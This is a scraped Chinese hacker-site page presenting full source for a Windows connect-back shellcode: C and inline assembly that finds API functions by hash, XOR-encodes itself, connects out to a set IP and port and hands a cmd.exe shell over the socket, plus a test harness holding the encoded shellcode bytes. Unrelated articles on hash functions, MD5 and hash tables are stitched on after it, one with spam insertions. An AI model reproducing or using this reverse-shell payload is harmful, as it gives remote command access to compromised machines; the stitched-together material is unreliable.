利用hash值取得函数地址的connect back shellcode

利用hash值取得函数地址的connect back shellcode
利用hash值取得函数地址的connect back shellcode

主页

安全文档 安全工具 安全漏洞 漏洞利用 红盟作品 开放项目 红盟社

区 关于我们

递交作品

作品总数: 38 个 本类作品: 19 个 关键字所有分类搜索快速通道

软件作品

文档作品

代码作品

<=

文档分类

Windows

RPC DCOM DoS exploit

Serv-U

FTPD 2.x/3.x/4.x/5.x "MDTM" Command Rem...

Mysql

3.23.x/

4.0.x remote exploit

download

url file shellcode for win2k/xp

利用hash

值取得函数地

址的connect back shellcode.

分析理解

elf 文件并且自动编排

shellcode 的程序 推荐作品

提交作品: lion 提交日期: 2003-09-17 作品属性: 推荐 文档类别: 代码作品 浏览次数: 今9次/总6234次 /****************************************************************** 作者: lion, lion@https://www.360docs.net/doc/5715520224.html, 日期: 2003-09-17 网站: https://www.360docs.net/doc/5715520224.html, 此shellcode 特点: a. 通过peb 取得kernel32.dll 地址 b. 通过函数的hash 值来进行比较,代替GetProcAddress 取得函数地址 c. 反连接功能 d. win2000/xp 测试成功 参考资料: https://www.360docs.net/doc/5715520224.html,/documents/winasm-1.0.1.pdf https://www.360docs.net/doc/5715520224.html,/sc/win32_reverse.asm ******************************************************************* #include #include //#include

//#pragma comment(lib, "ws2_32") void shellcode(); void printsc(unsigned char *sc, int len);

DWORD addr;

unsigned char hash[0x300] = {0}; unsigned char sc[0x1000];

// 要打印hash 的函数列表

unsigned char buff[]= "LoadLibraryA\x0"

利用hash 值取得函数地址的connect back shellcode.

"CreateProcessA\x0"

"ExitProcess\x0"

//"ExitThread\x0"

"WSAStartup\x0"

"WSASocketA\x0"

"connect\x0"

"closesocket\x0";

// 取得函数的hash值

static DWORD __stdcall GetHash ( char *c )

{

DWORD h = 0;

while ( *c )

{

__asm ror h, 13

h += *c++;

}

return( h );

}

void main()

{

unsigned char temp;

unsigned char *shellcodefnadd, *start;

int k;

char *fnendstr = "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; #define FNENDLONG 0x08

int all, i, j,n;

//int port = 53;

char *p;

DWORD h;

// WSADATA wsa;

// WSAStartup(MAKEWORD(2,1),&wsa);

memset(sc, 0, sizeof(sc));

// 定位shellcodefnlock的汇编代码

shellcodefnadd = (unsigned char*)shellcode;

temp = *shellcodefnadd;

if(temp == 0xe9)

{

++shellcodefnadd;

k=*(int *)shellcodefnadd;

shellcodefnadd+=k;

shellcodefnadd+=4;

}

// 定位shellcode的起始地址

for(k=0; k <= 0x500; ++k)

{

if(memcmp(shellcodefnadd+k, fnendstr, FNENDLONG)==0) break; }

// shellcodefnadd+k+8 是得到的shellcodefnlock汇编代码地址

start = shellcodefnadd+k+8;

// 定位shellcode 长度

for(k=0; k <= 0x500; ++k)

{

if(memcmp(start+k, fnendstr, FNENDLONG) == 0) break;

}

//printf("%x\n", htons(port));

j = 0;

n = 0;

// 循环从列表中计算并打印出函数hash值

for(i=0; i

{

p = &buff[i-j+1];

if(buff[i] == 0x00)

{

if(i == j)

{

p = &buff[0];

}

printf("#%d i:%d ", j, i);

j = 0;

h = GetHash(p);

memcpy(hash+n, &h, 4);

n += 4;

printf("%s Hash: 0x%08X\n", p, h);

if(buff[i+1] == 0x00) break;

}

printf(".");

j ++;

}

all = k;

memcpy(sc, start, all);

printf("\nShellcodeLen: %d\n\n", all);

for(k=0; k <= all-3; ++k)

{

if(sc[k] == 0x00 && sc[k+1] == 0x35) printf("port offset: %d\r\n\n", k); if(sc[k] == 0x7F && sc[k+3] == 0x01) printf("ip offset: %d\r\n", k);

}

// ================== print ======================

///*

// decode 长度为23字节

k = all - 23;

memcpy(sc+8, &k, 2);

printsc (sc, 23);

// xor shellcode 0x99

for(i=23; i < all; i++)

{

sc[i] ^= 0x99;

}

printsc (sc+23, all-23);

//*/

// printsc(sc, all);

addr = (DWORD)≻

__asm

{

jmp addr

}

return;

}

void printsc(unsigned char *sc, int len)

{

int l;

// 打印普通shellcode

for(l = 0; l < len; l++)

{

if(l == 0) printf("\"");

if((l%16 == 0) && (l != 0))printf("\"\n\"");

printf("\\x%.2X", sc[l]);

if(l == len-1) printf("\"");

}

printf("\n\n");

/*

// 打印iis unicode shellcode

for(l = 0; l < len; l += 2)

{

if(l == 0) printf("\"");

if((l%16 == 0) && (l != 0))printf("\"\n\"");

printf("%%u%.2X%.2X", sc[l+1], sc[l]);

if(l == len-2) printf("\"");

}

*/

}

void shellcode (void)

{

__asm

{

nop

nop

nop

nop

nop

nop

nop

nop

}

__asm

{

//-------------------------------------------------------------------- //

// 解码开始

//

//-------------------------------------------------------------------- jmp decode_end

decode_start:

pop edx // 得到解码开始位置esp -> edx dec edx

xor ecx,ecx

mov cx,0x1FF // 要解码shellcode长度

decode_loop:

xor byte ptr [edx+ecx], 0x99

loop decode_loop

jmp decode_ok

decode_end:

call decode_start

decode_ok:

//-------------------------------------------------------------------- //

// shellcode开始

//

//-------------------------------------------------------------------- start:

push esp

mov ebp, esp

// ====== 分配空间存放函数地址======

sub esp, 40

mov esi, esp

/*

[esi] stack layout

00 kernel32.dll

04 LoadLibraryA

08 CreateProcessA

12 ExitProcess

16 ws2_32.dll

20 WSASocketA

24 connect

28 closesocket

32 WSAStartup

*/

//-------------------------------------------------------------------- //

// 由hash值取得函数地址

//

//-------------------------------------------------------------------- LoadFunctions:

call GetKernel32BaseAddr

mov [esi], eax

// ====== 取得LoadLibraryA 函数地址======

push [esi]

push 0xec0e4e8e

call LGetProcAddress

mov [esi + 4], eax

// ====== 取得CreateProcessA 函数地址======

push [esi]

push 0x16b3fe72

call LGetProcAddress

mov [esi + 8], eax

// ====== 取得ExitProcess 函数地址======

push [esi]

push 0x73e2d87e

call LGetProcAddress

mov [esi + 12], eax

// ====== 取得WS2_32.DLL 地址======

push 0x00003233

push 0x5f327377

push esp

call [esi + 4]

mov [esi + 16], eax

// ====== 取得WSASocketA 函数地址======

push [esi + 16]

push 0xadf509d9

call LGetProcAddress

mov [esi + 20], eax

// ====== 取得connect 函数地址======

push [esi + 16]

push 0x60aaf9ec

call LGetProcAddress

mov [esi + 24], eax

// ====== 取得closesocket 函数地址======

push [esi + 16]

push 0x79C679E7

call LGetProcAddress

mov [esi + 28], eax

// ====== 取得WSAStartup 函数地址======

push [esi + 16]

push 0x3bfcedcb

call LGetProcAddress

mov [esi + 32], eax

//--------------------------------------------------------------------

//

// 反连开始

//

//-------------------------------------------------------------------- LWSAStartup:

// ====== WSAStartup(0x101, &WSADATA[400 bytes!]); ====== sub esp, 400

push esp

push 0x101

call [esi + 32]

LWSASocketA:

// ====== s=WSASocketA(2,1,0,0,0,0); ======

push eax

push eax

push eax

push eax

inc eax

push eax

inc eax

push eax

call [esi + 20]

mov ebx, eax // socket句柄保存在ebx

LReconnect:

// ====== connect(s, host, port); ======

push 0x0100007F // host: 127.0.0.1

push 0x35000002 // port: 53

mov ecx, esp

push 0x10

push ecx

push ebx

call [esi + 24]

// ====== 如果连接不成功,则退出======

test eax, eax

jne LFinished

LPushCmd:

// ====== push "cmd" ======

push 0x00646d63

mov [esi + 48], esp

LCreateProcessStructs:

// ====== 为STARTUPINFO, PROCESS_INFORMATION 分配空间====== sub esp, 16 + 68

// ====== zero out SI/PI ======

lea edi, [esp]

// xor eax, eax

xor ecx, ecx

add ecx, 21

LBzero:

stosd

loop LBZero

mov [esp + 16], 68 // si.cb = sizeof(si)

inc [esp + 61] // si.dwFlags = 0x100

// ====== 进程的输入输出出错句柄指定为输出到socket ======

//mov [esp + 16 + 45], 0x01 // dwFlags

//mov [esp + 16 + 48],0 // wShowWindow

mov [esp + 16 + 56], ebx // si.hStdInput = s

mov [esp + 16 + 60], ebx // hStdOutput = s

mov [esp + 16 + 64], ebx // hStdError = s

LCreateProcess:

// ====== CreactProcessA(NULL,"CMD",0,0,1,0,0,0,si,pi); ======

lea eax, [esp + 16]

push esp // pi

push eax // si

push ecx // lpCurrentDirectory

push ecx // lpEnvironment

push ecx // dwCreationFlags

push 1 // bInheritHandles

push ecx // lpThreadAttributes

push ecx // lpProcessAttributes

push [esi + 48] // lpCommandLine = "cmd"

push ecx // lpApplicationName NULL

call [esi + 8] // CreateProcessA

//mov ecx, esp

LCloseSocket:

// ===== CloseSocket(s); =====

push ebx

call [esi + 28]

LFinished:

// ===== ExitProcess(); =====

//push 1

call [esi + 12]

//--------------------------------------------------------------------

//

// GetKernel32BaseAddr(); 取得kernel32的基地址子程序

//

//-------------------------------------------------------------------- GetKernel32BaseAddr:

push ebp

push esi

// ===== 从PEB 中取得KERNEL32.DLL的起始地址=====

mov eax, fs:0x30 // PEB

mov eax, [eax + 0x0c] // PROCESS_MODULE_INFO

mov esi, [eax + 0x1c] // InInitOrder.flink

lodsd // eax = InInitOrder.blink

mov ebp, [eax + 0x08] // ebp = kernel32.dll base address mov eax, ebp

pop esi

pop ebp

ret 4

//--------------------------------------------------------------------

//

// LGetProcAddress(HASH, DLLBASE);

//

//-------------------------------------------------------------------- LGetProcAddress:

push ebx

push ebp

push esi

push edi

mov ebp, [esp + 24] // DLL Base Address

mov eax, [ebp + 0x3c] // eax = PE header offset

mov edx, [ebp + eax + 120]

add edx, ebp // edx = exports directory table

mov ecx, [edx + 24] // ecx = number of name pointers mov ebx, [edx + 32]

add ebx, ebp // ebx = name pointers table

LFnlp:

jecxz LNtfnd

dec ecx

mov esi, [ebx + ecx * 4]

add esi, ebp // esi = name pointer

xor edi, edi

cld

LHshlp:

xor eax, eax

lodsb

cmp al, ah

je LFnd

ror edi, 13

add edi, eax

jmp LHshlp

LFnd:

// ===== 比较hash是否相同=====

cmp edi, [esp + 20]

jnz LFnlp

mov ebx, [edx + 36] // ebx = ordinals table RNA

add ebx, ebp

mov cx, [ebx + 2 * ecx] // ecx = function ordinal

mov ebx, [edx + 28] // ebx = address table RVA

add ebx, ebp

mov eax, [ebx + 4 * ecx] // eax = address of function RVA

add eax, ebp

jmp LDone

LNtfnd:

xor eax, eax

LDone:

mov edx, ebp

pop edi

pop esi

pop ebp

pop ebx

ret 4

end:

}

__asm

{

nop

nop

nop

nop

nop

nop

nop

nop

}

}

测试代码:

#include

#pragma comment(lib, "ws2_32")

// change this

#define PORT 53

#define IP "127.0.0.1"

// don't change the offset

#define PORT_OFFSET 200

#define IP_OFFSET 193

unsigned char cbshellcode[]=

"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x77\x01\x80\x34\x0A\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF"

"\xCD\x12\x75\x1A\x75\xB1\x12\x6D\x71\x60\x99\x99\x99\x10\x9F\x66" "\xAF\xF1\x17\xD7\x97\x75\x71\x9D\x98\x99\x99\x10\xDF\x9D\x66\xAF" "\xF1\xEB\x67\x2A\x8F\x71\x6C\x99\x99\x99\x10\xDF\x91\x66\xAF\xF1" "\xE7\x41\x7B\xEA\x71\x7F\x99\x99\x99\x10\xDF\x95\xF1\xAA\xAB\x99" "\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\xCF\x9D\x10\xDF\x89\x66\xEF\x89" "\xF1\x40\x90\x6C\x34\x71\x5C\x99\x99\x99\x10\xDF\x8D\x66\xEF\x89" "\xF1\x75\x60\x33\xF9\x71\x2C\x99\x99\x99\x10\xDF\x81\x66\xEF\x89" "\xF1\x7E\xE0\x5F\xE0\x71\x3C\x99\x99\x99\x10\xDF\x85\x66\xEF\x89" "\xF1\x52\x74\x65\xA2\x71\x0C\x99\x99\x99\x10\xDF\xB9\x18\x75\x09"

Copyright ? 2000-2004 HUC All Rights Reserved.

中国红客网络技术联盟 https://www.360docs.net/doc/5715520224.html,

webmaster@https://www.360docs.net/doc/5715520224.html, "\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\xB9\xC9\xC9\xC9\xC9" "\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B" "\x99\x99\xAC\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xDA" "\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xAA\x50" "\x1A\x58\x8C\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10" "\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD" "\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x91\xCA" "\x66\xCF\x85\x66\xCF\x95\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x12\xD9" "\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x5C\xC7\xC4\x5B\x9D\x99\xCA" "\xCC\xCF\xCE\x12\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C" "\x12\xD3\x81\x12\xC3\xB9\x9A\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C" "\xAA\x66\x65\xAA\x59\x35\xA3\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72" "\x6B\xA2\xE5\xBD\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2" "\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C" "\xC6\xC7\xC4\xC2\x5B\x9D\x99";

void main() {

WSADATA wsa; unsigned short port; unsigned long ip;

WSAStartup(MAKEWORD(2,2),&wsa); port = htons(PORT)^(USHORT)0x9999;

ip = inet_addr(IP)^(ULONG)0x99999999; memcpy(&cbshellcode[PORT_OFFSET], &port, 2);

memcpy(&cbshellcode[IP_OFFSET], &ip, 4);

__asm { lea eax,cbshellcode jmp eax

}

}

返回上页

什么是哈希函数

什么是哈希函数 哈希(Hash)函数在中文中有很多译名,有些人根据Hash的英文原意译为“散列函数”或“杂凑函数”,有些人干脆把它音译为“哈希函数”,还有些人根据Hash函数的功能译为“压缩函数”、“消息摘要函数”、“指纹函数”、“单向散列函数”等等。 1、Hash算法是把任意长度的输入数据经过算法压缩,输出一个尺寸小了很多的固定长度的数据,即哈希值。哈希值也称为输入数据的数字指纹(Digital Fingerprint)或消息摘要(Message Digest)等。Hash函数具备以下的性质: 2、给定输入数据,很容易计算出它的哈希值; 3、反过来,给定哈希值,倒推出输入数据则很难,计算上不可行。这就是哈希函数的单向性,在技术上称为抗原像攻击性; 4、给定哈希值,想要找出能够产生同样的哈希值的两个不同的输入数据,(这种情况称为碰撞,Collision),这很难,计算上不可行,在技术上称为抗碰撞攻击性; 5、哈希值不表达任何关于输入数据的信息。 哈希函数在实际中有多种应用,在信息安全领域中更受到重视。从哈希函数的特性,我们不难想象,我们可以在某些场合下,让哈希值来“代表”信息本身。例如,检验哈希值是否发生改变,借以判断信息本身是否发生了改变。` 怎样构建数字签名 好了,有了Hash函数,我们可以来构建真正实用的数字签名了。 发信者在发信前使用哈希算法求出待发信息的数字摘要,然后用私钥对这个数字摘要,而不是待发信息本身,进行加密而形成一段信息,这段信息称为数字签名。发信时将这个数字签名信息附在待发信息后面,一起发送过去。收信者收到信息后,一方面用发信者的公钥对数字签名解密,得到一个摘要H;另一方面把收到的信息本身用哈希算法求出另一个摘要H’,再把H和H’相比较,看看两者是否相同。根据哈希函数的特性,我们可以让简短的摘要来“代表”信息本身,如果两个摘要H和H’完全符合,证明信息是完整的;如果不符合,就说明信息被人篡改了。 数字签名也可以用在非通信,即离线的场合,同样具有以上功能和特性。 由于摘要一般只有128位或160位比特,比信息本身要短许多倍,USB Key或IC卡中的微处理器对摘要进行加密就变得很容易,数字签名的过程一般在一秒钟内即可完成。

哈希算法散列

计算机算法领域 基本知识 Hash,一般翻译做“散列”,也有直接音译为”哈希“的,就是把任意长度的输入(又叫做预映射,pre-image),通过散列算法,变换成固定长度的输出,该输出就是散列值。这种转换是一种压缩映射,也就是,散列值的空间通常远小于输入的空间,不同的输入可能会散列成相同的输出,而不可能从散列值来唯一的确定输入值。简单的说就是一种将任意长度的消息压缩到某一固定长度的消息摘要的函数。 HASH主要用于信息安全领域中加密算法,他把一些不同长度的信息转化成杂乱的128位的编码里,叫做HASH值. 也可以说,hash就是找到一种数据内容和数据存放地址之间的映射关系 基本概念 * 若结构中存在关键字和K相等的记录,则必定在f(K)的存储位置上。由此,不需比较便可直接取得所查记录。称这个对应关系f为散列函数(Hash function),按这个思想建立的表为散列表。 * 对不同的关键字可能得到同一散列地址,即key1≠key2,而f(key1)=f(key2),这种现象称冲突。具有相同函数值的关键字对该散列函数来说称做同义词。综上所述,根据散列函数H(key)和处理冲突的方法将一组关键字映象到一个有限的连续的地址集(区间)上,并以关键字在地址集中的“象” 作为记录在表中的存储位置,这种表便称为散列表,这一映象过程称为散列造表或散列,所得的存储位置称散列地址。 * 若对于关键字集合中的任一个关键字,经散列函数映象到地址集合中任何一个地址的概率是相等的,则称此类散列函数为均匀散列函数(Uniform Hash function),这就是使关键字经过散列函数得到一个“随机的地址”,从而减少冲突。 常用的构造散列函数的方法 散列函数能使对一个数据序列的访问过程更加迅速有效,通过散列函数,数据元素将被更快地定位ǐ 1. 直接寻址法:取关键字或关键字的某个线性函数值为散列地址。即H(key)=key或H(key) = a?key + b,其中a和b为常数(这种散列函数叫做自身函数) 2. 数字分析法 3. 平方取中法 4. 折叠法 5. 随机数法 6. 除留余数法:取关键字被某个不大于散列表表长m的数p除后所得的余数为散列地址。即H(key) = key MOD p, p<=m。不仅可以对关键字直接取模,也可在折叠、平方取中等运算之后取模。对p的选择很重要,一般取素数或m,若p选的不好,容易产生同义词。 处理冲突的方法 1. 开放寻址法;Hi=(H(key) + di) MOD m, i=1,2,…, k(k<=m-1),其中H(key)为散列函数,m为散列表长,di为增量序列,可有下列三种取法: 1. di=1,2,3,…, m-1,称线性探测再散列; 2. di=1^2, (-1)^2, 2^2,(-2)^2, (3)^2, …, ±(k)^2,(k<=m/2)称二次探测再散列;

单向散列函数算法Hash算法

单向散列函数算法(Hash算法): 一种将任意长度的消息压缩到某一固定长度(消息摘要)的函数(过程不可逆),常见的单向散列算法有MD5,SHA.RIPE-MD,HAVAL,N-Hash 由于Hash函数的为不可逆算法,所以软件智能使用Hash函数作为一个加密的中间步骤 MD5算法: 即为消息摘要算法(Message Digest Algorithm),对输入的任意长度的消息进行预算,产生一个128位的消息摘要 简易过程: 1、数据填充..即填出消息使得其长度与448(mod 512)同余,也就是说长度比512要小64位(为什么数据长度本身已经满足却仍然需要填充?直接填充一个整数倍) 填充方法是附一个1在后面,然后用0来填充.. 2、添加长度..在上述结果之后附加64位的消息长度,使得最终消息的长度正好是512的倍数.. 3、初始化变量..用到4个变量来计算消息长度(即4轮运算),设4个变量分别为A,B,C,D(全部为32位寄存器)A=1234567H,B=89abcdefH,C=fedcba98H,D=7654321H 4、数据处理..首先进行分组,以512位为一个单位,以单位来处理消息.. 首先定义4个辅助函数,以3个32为双字作为输入,输出一个32为双字 F(X,Y,Z)=(X&Y)|((~X)&Z) G(X,Y,Z)=(X&Z)|(Y&(~Z)) H(X,Y,Z)=X^Y^Z I(X,Y,Z)=Y^(X|(~Z)) 其中,^是异或操作 这4轮变换是对进入主循环的512为消息分组的16个32位字分别进行如下操作: (重点)将A,B,C,D的副本a,b,c,d中的3个经F,G,H,I运算后的结果与第四个相加,再加上32位字和一个32位字的加法常数(所用的加法常数由这样一张表T[i]定义,期中i为1至64之中的值,T[i]等于4294967296乘以abs(sin(i))所得结果的整数部分)(什么是加法常数),并将所得之值循环左移若干位(若干位是随机的??),最后将所得结果加上a,b,c,d之一(这个之一也是随机的?)(一轮运算中这个之一是有规律的递增的..如下运算式),并回送至A,B,C,D,由此完成一次循环。(这个循环式对4个变量值进行计算还是对数据进行变换??) For i=0 to N/16 do For j=0 to 15 do Set X[i] to M[i*16+j] End AA = A BB=B CC=C DD=D //第一轮,令[ABCD K S I]表示下面的操作: //A=B+((A+F(B,C,D)+X[K]+T[I])<<

数据结构课程设计哈希表设计问题复习过程

数据结构课程设计哈希表设计问题

目录 1 前言 (1) 2 需求分析 (1) 2.1 任务和要求 (1) 2.2 运行环境 (1) 2.3 开发工具 (1) 3 分析和设计 (2) 3.1 系统分析及设计思路 (2) 3.2 主要数据结构及算法 (2) 3.3 函数流程图 (2) (1)哈希表的创建及初始化流程图 (2) 5 课程设计总结 (13) 5.1 程序运行结果或预期运行结果 (13) 说明:输入的数为30个姓的拼音,查找的为“pan”,输出的如上图所示。 (14) 5.2 设计结论 (15) 参考文献 (15) 致谢 (15)

1 前言 从C语言产生到现在,它已经成为最重要和最流行的编程语言之一。在各种流行编程语言中,都能看到C语言的影子,如Java的语法与C语言基本相同。学习、掌握C语言是每一个计算机技术人员的基本功之一。 根据本次课程设计的要求,我设计小组将编写一个C语言程序来处理哈希表问题,通过这个程序,将针对自己的班集体中的“人名”设计一个哈希表,使得平均查找长度不超过R,完成相应的建表和查表程序。 2 需求分析 2.1 任务和要求 针对自己的班集体中的“人名”设计一个哈希表,使得平均查找长度不超过R,完成相应的建表和查表程序。 要求:假设人名为中国姓名的汉语拼音形式。待填入哈希表的人名共有30个,取平均查找长度的上限为2。哈希函数用除留余数法构造,用链表法处理冲突。 2.2 运行环境 (1)WINDOWS2000/XP系统 (2)Visual C++ 6.0编译环境或TC编译环境 2.3 开发工具 C语言

3 分析和设计 3.1 系统分析及设计思路 (1)创建哈希表 (2)姓名(结构体数组)初始化 (1)用除留余数法构建哈希函数 (2)用链表法处理冲突 (3)查找哈希表 在哈希表中进行查找,输出查找的结果和关键字,并计算和输出查找成功的平均查找长度 (4) 显示哈希表 显示哈希表的的格式: 3.2 主要数据结构及算法 定义结构体typedef struct hashtable创建哈希表 定义函数Hash_Init(HashTable ht)来对哈希表初始化 定义函数Hash_Insert(HashTable ht, Node *node)来为哈希表分配地址 定义函数Hash_Init(ht)输入30个名字 定义函数Hash_Create(HashTable ht)来求哈希表长度 定义函数hash_output(HashTable h)来输出哈希表 定义函数Hash_Link()构造链表函数 定义函数int hash_search(int h[],int key)查找输入的名字 3.3 函数流程图 (1)哈希表的创建及初始化流程图

最小完美哈希函数(深入搜索引擎)

最小完美哈希函数 哈希函数h是一个能够将n个键值x j的集合映射到一个整数集合的函数h(x i),其值域范围是0≤h(x j)≤m-l,允许重复。哈希是一个具有查找表功能并且提供平均情况下快速访问的标准方法。例如,当数 据包含n个整数键值。某常用哈希函数采用h(x)=x mod m,其中m 是一个较小的值,且满足m>n/a。a是装载因子,表示记录数和可用地址数的比例关系。m一般选择一个素数,因此如果要求提供一个对1000个整数键值进行哈希的函数,一个程序员可能会建议写出如下函数形式:,h(x)=x mod 1399。并且提供一个装载因子为。a=0.7的表,该表声明能够存放1399个地址。 a越小,两个不同键值在相同哈希值相互冲突的可能性就越小,然而冲突总是不可避免。第1次考虑这个问题时,事实可能让人吃惊,最好的例子莫过于著名的生日悖论(birthday paradox)。假定一年有365天,那么要组合多少个人,才能使得出现生日相同的人这一概率超过0.5呢?换句话说,给定一个365个哈希槽(hashslot)。随机选择多少个键值才能够使得出现冲突的概率超过0.5?当首次面对这样一个问题时,一般的反应肯定是认为需要很多人才行。事实上,答案是只需区区23人。找到一个能够满足现实大小要求且无冲突的哈希函数的几率小到几乎可以忽略25。例如,一个1000个键值和1399个随机选择的槽,完全没有冲突的概率为 2.35×10-217(概率的计算诱导公式将在下一节中给出,以公式4.1代入m=1399和n=1000得到),如何才能最好地处理这些不可避免冲突?这一话题将在本节中以大段篇幅展开,这里我们正是要找到其中万里挑一的能够避免所有冲突的哈 希函数。 25可以试图在一群人中做这样一个有趣的实验,笔者曾在讲述哈希表的课上和同学们做 过多次这样的实验。有一项很重要的事情往往被我们忽略,即参加者必须事先在纸上写下他们的生日(或者其他任意日子)。然后才能开始核对的工作,这样才能消除神奇的负反馈。在我们的实验中,除非这样做了,否则也许必须找到366个同学才能遇到第1次碰撞,也许这乜存在心理学悖论吧。

哈 希 常 见 算 法 及 原 理

计算与数据结构篇 - 哈希算法 (Hash) 计算与数据结构篇 - 哈希算法 (Hash) 哈希算法的定义和原理非常简单,基本上一句话就可以概括了。将任意长度的二进制值串映射为固定长度的二进制值串,这个映射的规则就是哈希算法,而通过原始数据映射之后得到的二进制值串就是哈希值。 构成哈希算法的条件: 从哈希值不能反向推导出原始数据(所以哈希算法也叫单向哈希算法)对输入数据非常敏感,哪怕原始数据只修改了一个 Bit,最后得到的哈希值也大不相同; 散列冲突的概率要很小,对于不同的原始数据,哈希值相同的概率非常小; 哈希算法的执行效率要尽量高效,针对较长的文本,也能快速地计算出哈希值。 哈希算法的应用(上篇) 安全加密 说到哈希算法的应用,最先想到的应该就是安全加密。最常用于加密的哈希算法是 MD5(MD5 Message-Digest Algorithm,MD5 消息摘要算法)和 SHA(Secure Hash Algorithm,安全散列算法)。 除了这两个之外,当然还有很多其他加密算法,比如 DES(Data Encryption Standard,数据加密标准)、AES(Advanced Encryption Standard,高级加密标准)。

前面我讲到的哈希算法四点要求,对用于加密的哈希算法来说,有两点格外重要。第一点是很难根据哈希值反向推导出原始数据,第二点是散列冲突的概率要很小。 不过,即便哈希算法存在散列冲突的情况,但是因为哈希值的范围很大,冲突的概率极低,所以相对来说还是很难破解的。像 MD5,有 2^128 个不同的哈希值,这个数据已经是一个天文数字了,所以散列冲突的概率要小于 1-2^128。 如果我们拿到一个 MD5 哈希值,希望通过毫无规律的穷举的方法,找到跟这个 MD5 值相同的另一个数据,那耗费的时间应该是个天文数字。所以,即便哈希算法存在冲突,但是在有限的时间和资-源下,哈希算法还是被很难破解的。 对于加密知识点的补充,md5这个算法固然安全可靠,但网络上也有针对MD5中出现的彩虹表,最常见的思路是在密码后面添加一组盐码(salt), 比如可以使用md5(1234567.'2019@STARK-%$#-idje-789'),2019@STARK-%$#-idje-789 作为盐码起到了一定的保护和安全的作用。 唯一标识(uuid) 我们可以给每一个图片取一个唯一标识,或者说信息摘要。比如,我们可以从图片的二进制码串开头取 100 个字节,从中间取 100 个字节,从最后再取 100 个字节,然后将这 300 个字节放到一块,通过哈希算法(比如 MD5),得到一个哈希字符串,用它作为图片的唯一标识。通过这个唯一标识来判定图片是否在图库中,这样就可以减少很多工作量。

哈 希 常 见 算 法 及 原 理

数据结构与算法-基础算法篇-哈希算法 1. 哈希算法 如何防止数据库中的用户信息被脱库? 你会如何存储用户密码这么重要的数据吗?仅仅 MD5 加密一下存储就够了吗? 在实际开发中,我们应该如何用哈希算法解决问题? 1. 什么是哈希算法? 将任意长度的二进制值串映射成固定长度的二进制值串,这个映射的规则就是哈希算法,而通过原始数据映射之后得到的二进制值串就是哈希值。 2. 如何设计一个优秀的哈希算法? 单向哈希: 从哈希值不能反向推导出哈希值(所以哈希算法也叫单向哈希算法)。 篡改无效: 对输入敏感,哪怕原始数据只修改一个Bit,最后得到的哈希值也大不相同。 散列冲突: 散列冲突的概率要很小,对于不同的原始数据,哈希值相同的概率非常小。 执行效率: 哈希算法的执行效率要尽量高效,针对较长的文本,也能快速计算哈

希值。 2. 哈希算法的常见应用有哪些? 7个常见应用:安全加密、唯一标识、数据校验、散列函数、负载均衡、数据分片、分布式存储。 1. 安全加密 常用于加密的哈希算法: MD5:MD5 Message-Digest Algorithm,MD5消息摘要算法 SHA:Secure Hash Algorithm,安全散列算法 DES:Data Encryption Standard,数据加密标准 AES:Advanced Encryption Standard,高级加密标准 对用于加密的哈希算法,有两点格外重要,第一点是很难根据哈希值反向推导出原始数据,第二点是散列冲突的概率要小。 在实际开发中要权衡破解难度和计算时间来决定究竟使用哪种加密算法。 2. 唯一标识 通过哈希算法计算出数据的唯一标识,从而用于高效检索数据。 3. 数据校验 利用哈希算法对输入数据敏感的特点,可以对数据取哈希值,从而高效校验数据是否被篡改过。 4. 散列函数 1.如何防止数据库中的用户信息被脱库?你会如何存储用户密码这么重要的数据吗?

哈 希 常 见 算 法 及 原 理 ( 2 0 2 0 )

哈希算法乱谈(摘自知乎) 最近【现场实战追-女孩教-学】初步了解了Hash算法的相关知识,一些人的见解让我能够迅速的了解相对不熟悉的知识,故想摘录下来,【QQ】供以后温故而知新。 HASH【⒈】算法是密码学的基础,比较常用的有MD5和SHA,最重要的两【О】条性质,就是不可逆和无冲突。 所谓不【1】可逆,就是当你知道x的HASH值,无法求出x; 所谓无【б】冲突,就是当你知道x,无法求出一个y,使x与y的HA【9】SH值相同。 这两条性【⒌】质在数学上都是不成立的。因为一个函数必然可逆,且【2】由于HASH函数的值域有限,理论上会有无穷多个不同的原始值【6】,它们的hash值都相同。MD5和SHA做到的,是求逆和求冲突在计算上不可能,也就是正向计算很容易,而反向计算即使穷尽人类所有的计算资-源都做不到。 顺便说一下,王小云教授曾经成功制造出MD5的碰撞,即md5(a) = md5(b)。这样的碰撞只能随机生成,并不能根据一个已知的a求出b(即并没有破坏MD5的无冲突特性)。但这已经让他声名大噪了。 HASH算法的另外一个很广泛的用途,就是很多程序员都会使用的在数据库中保存用户密码的算法,通常不会直接保存用户密码(这样DBA就能看到用户密码啦,好危险啊),而是保存密码的HASH值,验

